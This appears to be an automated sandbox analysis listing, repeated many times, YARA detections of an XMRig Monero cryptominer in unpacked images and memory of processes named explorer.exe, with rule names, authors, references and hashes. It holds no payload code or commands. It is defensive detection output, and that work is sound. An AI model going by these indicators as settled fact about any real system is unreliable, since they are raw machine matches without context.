              Source: 18.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 18.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 18.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 17.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 17.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 18.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 17.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 18.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 17.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
              Source: 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.712169070.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.712169070.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000012.00000000.713121937.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000012.00000000.713121937.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000012.00000000.715770261.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000012.00000000.715770261.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000012.00000000.769937970.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000012.00000000.769937970.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000011.00000000.724751295.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.724751295.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, type: MEMORY; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000012.00000000.724515509.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000012.00000000.724515509.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000012.00000000.704591182.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000012.00000000.704591182.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000011.00000000.717951007.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.717951007.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 0000000F.00000003.719582086.000002A79BBD0000.00000004.00000001.sdmp, type: MEMORY; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.704736312.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.704736312.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000011.00000000.713985115.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.713985115.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000011.00000000.708825337.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.708825337.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000011.00000000.716519488.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.716519488.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000011.00000000.706517358.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.706517358.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000011.00000000.721988497.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.721988497.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000012.00000000.797286728.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000012.00000000.797286728.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000012.00000000.727173943.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000012.00000000.727173943.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000012.00000000.729811300.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000012.00000000.729811300.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000009.00000003.709450089.000002C968F90000.00000004.00000001.sdmp, type: MEMORY; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000009.00000003.717098920.000002C968F90000.00000004.00000001.sdmp, type: MEMORY; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.702282973.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.702282973.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000012.00000000.721557142.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000012.00000000.721557142.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000011.00000000.710365911.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.710365911.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000009.00000003.708284013.000002C968F90000.00000004.00000001.sdmp, type: MEMORY; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000012.00000000.710976279.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000012.00000000.710976279.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
